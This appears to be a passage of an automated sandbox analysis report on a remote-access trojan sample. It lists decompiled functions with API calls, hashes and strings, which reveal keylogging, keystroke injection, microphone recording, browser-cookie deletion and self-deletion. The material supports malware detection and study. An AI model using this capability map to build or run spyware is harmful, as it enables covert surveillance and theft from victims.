                                    • Instruction ID: 41baa3e662cb0dd7eb5d00c0b020563d19d5938c1c6fca01c2432a26466798f8
                                    • Opcode Fuzzy Hash: 89fa57c9394baf8a0f8aed933ed8777c2e6d6e622443ee4678cd1237a40ffd18
                                    • Instruction Fuzzy Hash: D1F0B4315412187FD2306B65AC88DBB3B6EDB413E0B004016F84586100DE6C8E46A6B8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007145EF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,006F8E1A,?,?,?,00714840,00000001,00000001,?), ref: 00714649
                                    • __alloca_probe_16.LIBCMT ref: 00714681
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,006F8E1A,?,?,?,00714840,00000001,00000001,?), ref: 007146CF
                                    • __alloca_probe_16.LIBCMT ref: 00714766
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007147C9
                                    • __freea.LIBCMT ref: 007147D6
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • __freea.LIBCMT ref: 007147DF
                                    • __freea.LIBCMT ref: 00714804
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                    • String ID:
                                    • API String ID: 2597970681-0
                                    • Opcode ID: 4fdc8dab8294ee21b7ee9be95be3d2dbb6bf71b7aa82f91988eede79b7e5077a
                                    • Instruction ID: 63f07e224ebbf1a11450908f77eab8cb687a7b843922f8a1977effd2313f536e
                                    • Opcode Fuzzy Hash: 4fdc8dab8294ee21b7ee9be95be3d2dbb6bf71b7aa82f91988eede79b7e5077a
                                    • Instruction Fuzzy Hash: 91519F72620216AFEF259E68CC85EFB77A9EB45760F154629FD04D61C0EB3CDC9086A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E5288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 006E52BC
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E52DA
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E52F7
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 006E5309
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E5320
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E533D
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 006E5359
                                    • SendInput.USER32(00000001,?,0000001C,?), ref: 006E5376
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: e1d8f13154cc9fb903dcacbe876957753c57aae2609d5081dfb5d3bd066bc095
                                    • Instruction ID: 798ca64b986d80a540aa09f125479aaafb8ff6b127221e293a3039de864ed89d
                                    • Opcode Fuzzy Hash: e1d8f13154cc9fb903dcacbe876957753c57aae2609d5081dfb5d3bd066bc095
                                    • Instruction Fuzzy Hash: 24312071D9025CA9FB109BD1CC46FFEBB7CAF18B14F04000AE704AA1C2D6E996858BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E0305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E0323
                                      • Part of subcall function 006E7093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,006D417D), ref: 006E70BA
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(006D41F6,?,006D41F6,0072F464), ref: 006E4341
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(0072F464,?,006D41F6,0072F464), ref: 006E434A
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E05A8
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E05D6
                                    • DeleteFileW.KERNEL32(00000000,0072F464,0072F464,0072F464), ref: 006E0604
                                    • Sleep.KERNEL32(000001F4,0072F464,0072F464,0072F464), ref: 006E061D
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                    • String ID: /stext "
                                    • API String ID: 1351907930-3856184850
                                    • Opcode ID: b04cbcf1d5957a0b5ed53acd9b3700b894498a3bdb67ef09813ce474809d17d8
                                    • Instruction ID: b6ac726c717cb17e211e8bae7eb23150ee24fdc26cfce5da44cbd7b6be918389
                                    • Opcode Fuzzy Hash: b04cbcf1d5957a0b5ed53acd9b3700b894498a3bdb67ef09813ce474809d17d8
                                    • Instruction Fuzzy Hash: FED12531D142585BCB99FB60DC91AED73B7AF55300F4041AEE40AAB292EF705F89CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00718CA5, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 581303ba9b53f05d063bd197c06f5525988096203ebbe314346d2b933c73b206
                                    • Instruction ID: 1c7f670d9a7d3b62dcebba5a058e38464d1f76f46b35ac653c1dec175c8bfa05
                                    • Opcode Fuzzy Hash: 581303ba9b53f05d063bd197c06f5525988096203ebbe314346d2b933c73b206
                                    • Instruction Fuzzy Hash: AF61D271900205EFDB60DF6CC842BDEBBF5EB08710F144169E954EB2C1EB78AD858B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00712E63, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0072913C), ref: 00712ECD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00712F45
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B7A8,000000FF,?,0000003F,00000000,?), ref: 00712F72
                                    • _free.LIBCMT ref: 00712EBB
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00713087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID: ~0q
                                    • API String ID: 1286116820-1500179217
                                    • Opcode ID: 8e44666c60dab387cc434b486dea1653083899add18d3c510506670ddcd83d99
                                    • Instruction ID: fb523988493dc09dbbfa3093aee11fded63a3cbf5703ae75a204206f29b1d4ec
                                    • Opcode Fuzzy Hash: 8e44666c60dab387cc434b486dea1653083899add18d3c510506670ddcd83d99
                                    • Instruction Fuzzy Hash: 4251E771900219EFDB10DF6CDC859EAB7BCEF40310F10426AE514971D2EB389E978B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D4FAD, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
                                    • API String ID: 481472006-2341810981
                                    • Opcode ID: 9e971957a911b8000bcd5b0e9109cfbae3d1e1deb060c9971ddd8bcf949dab59
                                    • Instruction ID: 8cb6fc180bbc9e18280dcede0e93b31ba84ea2cccaa0ce7c13f487489e305abc
                                    • Opcode Fuzzy Hash: 9e971957a911b8000bcd5b0e9109cfbae3d1e1deb060c9971ddd8bcf949dab59
                                    • Instruction Fuzzy Hash: 344108A2C00258BACB54FBB5DC55AFEB7FA9B19301F00405BF842E6291EB7C5A44D778
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D4E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96timethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 006D4ED2
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006D4F85
                                    • CreateThread.KERNEL32 ref: 006D4F98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                                    • API String ID: 2532271599-119634454
                                    • Opcode ID: b0074aa9011ade61b4e6c1ad1b99b11d7209604f6ab817483ac39f43a537a403
                                    • Instruction ID: abdd483e15e28d7ead19f66a5441e6d918d6a19af2012d7b6de192b5262cf3f2
                                    • Opcode Fuzzy Hash: b0074aa9011ade61b4e6c1ad1b99b11d7209604f6ab817483ac39f43a537a403
                                    • Instruction Fuzzy Hash: A0319061C00254BACB60ABA5CC09DFFBBFDAF95705F04041FF44296291EA789E45D774
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D1CEF, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strftime.LIBCMT ref: 006D1D34
                                      • Part of subcall function 006D1A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1ACC
                                    • waveInUnprepareHeader.WINMM(0073BA78,00000020,00000000,?), ref: 006D1DE6
                                    • waveInPrepareHeader.WINMM(0073BA78,00000020), ref: 006D1E24
                                    • waveInAddBuffer.WINMM(0073BA78,00000020), ref: 006D1E33
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav
                                    • API String ID: 3809562944-3597965672
                                    • Opcode ID: 1fb5927e799b7da869af5857a5e0772711ebfa204c0de47421f662cf19b0828d
                                    • Instruction ID: a814e69317ac829edea34c97351dd250640da69f64a94a921b02ac3eabbe4ee1
                                    • Opcode Fuzzy Hash: 1fb5927e799b7da869af5857a5e0772711ebfa204c0de47421f662cf19b0828d
                                    • Instruction Fuzzy Hash: F931C331908740AFD354FF60EC52A9E77EAEB95300F00C42EF6568A6A1EF745A05CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DA409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E08E2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 006E0904
                                      • Part of subcall function 006E08E2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 006E0923
                                      • Part of subcall function 006E08E2: RegCloseKey.ADVAPI32(?), ref: 006E092C
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 006DA48B
                                    • PathFileExistsA.SHLWAPI(?), ref: 006DA498
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: db4bd81efd6bb1ccbed5368a9b52a515525edb5282113b1438ef73e8be045522
                                    • Instruction ID: 802556b00ea74b3a7875d26bad42e09d8c043d3a4746b57b8873ae608ccde987
                                    • Opcode Fuzzy Hash: db4bd81efd6bb1ccbed5368a9b52a515525edb5282113b1438ef73e8be045522
                                    • Instruction Fuzzy Hash: 22217171D041156ACB54FBF0DC6ACFE77BA9F15300F44012EF90197392FEA49A4A8696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007201D3, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be1c5314b538dd1861600ff922d2b6575b4c48126bbc8be76458352259e04b4d
                                    • Instruction ID: 749be5051e46d30b4adbd698ec6b0bce3682118c6f7167c196ee14a2a683dfd7
                                    • Opcode Fuzzy Hash: be1c5314b538dd1861600ff922d2b6575b4c48126bbc8be76458352259e04b4d
                                    • Instruction Fuzzy Hash: 9111E472504269FBCB202F75AC0D96B7AECFF86720B104625F819C7192DA3C8901C6B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DE7E5, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DE7F2
                                    • int.LIBCPMT ref: 006DE805
                                      • Part of subcall function 006DB94C: std::_Lockit::_Lockit.LIBCPMT ref: 006DB95D
                                      • Part of subcall function 006DB94C: std::_Lockit::~_Lockit.LIBCPMT ref: 006DB977
                                    • std::locale::_Getfacet.LIBCPMT ref: 006DE80E
                                    • std::_Facet_Register.LIBCPMT ref: 006DE845
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006DE84E
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DE86C
                                    • __Init_thread_footer.LIBCMT ref: 006DE8AD
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                    • String ID:
                                    • API String ID: 2409581025-0
                                    • Opcode ID: a8053ce255f0b52ba33aab255b3da65f308baa6d68d4d1915461b8e301fa42e5
                                    • Instruction ID: bb4a4970f5737cda1c1551ead93a4dc30bd3dfa5f341c988e426e350e95438a1
                                    • Opcode Fuzzy Hash: a8053ce255f0b52ba33aab255b3da65f308baa6d68d4d1915461b8e301fa42e5
                                    • Instruction Fuzzy Hash: 19212676D00114DBD720FB68E846AAD73AA9F04320F21016FF904AB3D2DF359D0187D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                    • wsprintfW.USER32 ref: 006D96C3
                                    • SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimechar_traitswsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 3003339404-248792730
                                    • Opcode ID: a52e5813f2f747f2b4ce531d71c8f775f32adbb8543882659b1f440384f717f3
                                    • Instruction ID: 4c325c58706c121a6c21b3d2e2d85b29c02636bb686fae60f2d7dc0dead98fe3
                                    • Opcode Fuzzy Hash: a52e5813f2f747f2b4ce531d71c8f775f32adbb8543882659b1f440384f717f3
                                    • Instruction Fuzzy Hash: 3021B372804118BAC728EBA4EC55CFF77FAAF44700F00412FF80256291EE78AA46C768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E6F19, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71sleeplibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0073BACC,?,?,?,?,?,?,?,?,?,?,?,006E35C0), ref: 006E6F2C
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E6F33
                                    • Sleep.KERNEL32(000003E8,?,0073BACC,?,?,?,?,?,?,?,?,?,?,?,006E35C0,00000095), ref: 006E6F4E
                                    • __aulldiv.LIBCMT ref: 006E6FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProcSleep__aulldiv
                                    • String ID: GetSystemTimes$kernel32.dll
                                    • API String ID: 482274533-1354958348
                                    • Opcode ID: bbe31ac77077b3d8b17d6195696c794d76d112345c83863fcee79fb8f2cd296a
                                    • Instruction ID: 11a9b3c7ff035bb9a97f7e2b8b1953cbe063386393d71a94cb11a5e00b68e236
                                    • Opcode Fuzzy Hash: bbe31ac77077b3d8b17d6195696c794d76d112345c83863fcee79fb8f2cd296a
                                    • Instruction Fuzzy Hash: D0117573E01328AAC714A7F5DC95DEF7B7DAB54750F040625F506A3141ED385A0886E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E7947, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(i]m,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,006E7A71,00000000,00000000), ref: 006E7986
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79A2
                                    • CloseHandle.KERNEL32(00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79AE
                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79C0
                                    • CloseHandle.KERNEL32(00000000,?,006E7A71,00000000,00000000,00000000,00000004,?,006D5D69,00000000), ref: 006E79CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID: i]m
                                    • API String ID: 1852769593-2219906881
                                    • Opcode ID: 51f6c9d3f3391bdc76662e4684612698d5b6174b91e5ee2164b01d1b3beef5a9
                                    • Instruction ID: 00ee93dfaac86c54de6cc79dab2ddeb0083c51bcdd99df753968cdd5f6fca47e
                                    • Opcode Fuzzy Hash: 51f6c9d3f3391bdc76662e4684612698d5b6174b91e5ee2164b01d1b3beef5a9
                                    • Instruction Fuzzy Hash: 6B110271206258BFEB204F669C89EFA77AEEF06370F108225FA15D6281C6349E019678
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071917A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00718EC1: _free.LIBCMT ref: 00718EEA
                                    • _free.LIBCMT ref: 007191C8
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 007191D3
                                    • _free.LIBCMT ref: 007191DE
                                    • _free.LIBCMT ref: 00719232
                                    • _free.LIBCMT ref: 0071923D
                                    • _free.LIBCMT ref: 00719248
                                    • _free.LIBCMT ref: 00719253
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction ID: b90f13c2f23b718eb27c38f178b14e286feb3bfee60a145b8ee0378c5c385586
                                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction Fuzzy Hash: 7311EA72950B08FADB60BBB4CC4EFCF7798AF04700F404815B399664D2DF7DA5985691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007050B5, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,007050AC,007021F2), ref: 007050C3
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007050D1
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007050EA
                                    • SetLastError.KERNEL32(00000000,?,007050AC,007021F2), ref: 0070513C
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 8772fae84b21205c42a4a3bd75c1885f9c5693c0e6472c7399b13e26cb9e3a02
                                    • Instruction ID: 0c0faa191632c878a3ec32b16db219b1490bb5c8b29ea5b9302f2acc77b07d5b
                                    • Opcode Fuzzy Hash: 8772fae84b21205c42a4a3bd75c1885f9c5693c0e6472c7399b13e26cb9e3a02
                                    • Instruction Fuzzy Hash: 0C01D432249B15EEF7292B78BD8AB2B2AD5DB02375720432DF114811F1FF5D4C416A98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9F83, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 006D9FBF
                                    • GetLastError.KERNEL32 ref: 006D9FC9
                                    Strings
                                    • [Chrome Cookies not found], xrefs: 006D9FE3
                                    • UserProfile, xrefs: 006D9F8F
                                    • [Chrome Cookies found, cleared!], xrefs: 006D9FEF
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 006D9F8A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: e8a52d19a8714a142837f78582a1b24a36b8848d6cefa2ee7663c8b95ce166a1
                                    • Instruction ID: 188705b99c773f75dede832aeaff157ae4fbac08585f5acaa3640192da5d8e30
                                    • Opcode Fuzzy Hash: e8a52d19a8714a142837f78582a1b24a36b8848d6cefa2ee7663c8b95ce166a1
                                    • Instruction Fuzzy Hash: 0001F971E44109A78B08BBB4DD6B8FE7B66B912300740022FF802D73D2FD594A46C6E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0073C138,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5159
                                    • SetEvent.KERNEL32(?,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5165
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5170
                                    • CloseHandle.KERNEL32(?,?,006D4CA9,00000001,0073C138,006D4C56,00000000,00000000,00000000), ref: 006D5179
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: Connection KeepAlive disabled$[WARNING]
                                    • API String ID: 2993684571-804309475
                                    • Opcode ID: c7f2335c27b104e09a484ba2b673c05c100170ddefd6be4cffa2bcd6555367f5
                                    • Instruction ID: d680f73248868285d16f0f2f734251f28857b37de6ea857a3f21075500c4aa46
                                    • Opcode Fuzzy Hash: c7f2335c27b104e09a484ba2b673c05c100170ddefd6be4cffa2bcd6555367f5
                                    • Instruction Fuzzy Hash: 71F0F671900350BFDB203BB49C0EA767FA9EB05324F00452EF94282771CA7999518796
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E6737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 006E6769
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 006E6777
                                    • Sleep.KERNEL32(00002710), ref: 006E677E
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 006E6787
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm has been triggered!$[ALARM]
                                    • API String ID: 614609389-1190268461
                                    • Opcode ID: 0cd0e7c6f4f6b8726bfed379cc72c0b094954ec7f07a6466dc6ee010a5cea6c0
                                    • Instruction ID: 30987be9cadbd04ed707fcbf7105871aec04620e549b35582424e1550535f328
                                    • Opcode Fuzzy Hash: 0cd0e7c6f4f6b8726bfed379cc72c0b094954ec7f07a6466dc6ee010a5cea6c0
